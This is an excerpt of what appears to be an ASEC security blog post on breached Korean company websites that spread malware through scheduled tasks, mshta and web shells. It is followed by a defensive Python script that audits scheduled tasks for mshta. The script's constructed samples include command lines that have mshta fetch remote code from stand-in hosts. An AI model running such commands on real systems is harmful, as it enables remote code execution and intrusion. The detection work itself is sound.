Damages to Multiple Korean Websites Created by a Certain Website Development Company
AhnLab Security Emergency Response Center (ASEC) has discovered cases in which websites built by a certain Korean website development company were attacked and then used to distribute malware. This company has built websites for businesses in a wide range of industries, including manufacturing, trade, electrical, electronics, education, construction, medical, and travel.
The breached websites were used to distribute malware, and they also served other purposes, such as using web shells to transmit stolen information. The initial distribution phase of this attack is similar to the one covered in a previous ASEC Blog post, where the initial distribution was done through an email attachment. On an infected system, the malware is registered in the task scheduler, allowing the breach to continue over time.
Once a PC is infected, the threat actor gains remote control of it by using the legitimate mshta process to establish a connection with a web shell …
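A defender can hunt for the persistence described above by auditing scheduled-task definitions for actions that run mshta. The following is an added example, not code from ASEC or the original post: it assumes the scheduled task is what launches mshta (the excerpt does not show the task definition), reads the Task Scheduler XML format that `schtasks /query /xml` emits, and uses constructed task names and URLs.

```python
import re
import xml.etree.ElementTree as ET
from pathlib import PureWindowsPath

NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}
URL_RE = re.compile(r"https?://[^\s\"']+", re.I)
# "mshta" as a standalone token or path component inside an argument string
MSHTA_RE = re.compile(r"(?<![\w.-])mshta(\.exe)?(?![\w-])", re.I)

def audit_task(xml_text):
    """Return (task URI, command line, URLs) for each Exec action that runs mshta."""
    root = ET.fromstring(xml_text)
    uri = root.findtext("t:RegistrationInfo/t:URI", default="?", namespaces=NS)
    hits = []
    for ex in root.iterfind("t:Actions/t:Exec", NS):
        cmd = ex.findtext("t:Command", default="", namespaces=NS).strip().strip('"')
        args = ex.findtext("t:Arguments", default="", namespaces=NS)
        direct = PureWindowsPath(cmd).name.lower() in ("mshta", "mshta.exe")
        # Also catch mshta started indirectly, e.g. through cmd.exe /c
        if direct or MSHTA_RE.search(args):
            hits.append((uri, f"{cmd} {args}".strip(), URL_RE.findall(args)))
    return hits

def audit_all(tasks):
    """Audit several task definitions and flatten the findings."""
    return [hit for task in tasks for hit in audit_task(task)]

def make_task(uri, command, arguments):
    """Build a minimal task definition (constructed sample, not from the report)."""
    return (f'<Task version="1.2" xmlns="{NS["t"]}">'
            f'<RegistrationInfo><URI>{uri}</URI></RegistrationInfo>'
            f'<Actions Context="Author"><Exec><Command>{command}</Command>'
            f'<Arguments>{arguments}</Arguments></Exec></Actions></Task>')

# Constructed samples: two suspicious tasks and one benign task.
SAMPLES = [
    make_task(r"\OfficeUpdate", r"C:\Windows\System32\mshta.exe",
              "http://compromised-site.example/bbs/shell.php"),
    make_task(r"\Sync", "cmd.exe",
              "/c start /min mshta https://compromised-site.example/up.php"),
    make_task(r"\Defrag", r"%windir%\system32\defrag.exe", "-c -h -o"),
]

if __name__ == "__main__":
    for uri, line, urls in audit_all(SAMPLES):
        kind = "remote URL" if urls else "local target"
        print(f"[!] {uri}: {line} ({kind})")
```

A hit with a non-empty URL list deserves the most attention, since a scheduled task has little legitimate reason to point mshta at a remote address.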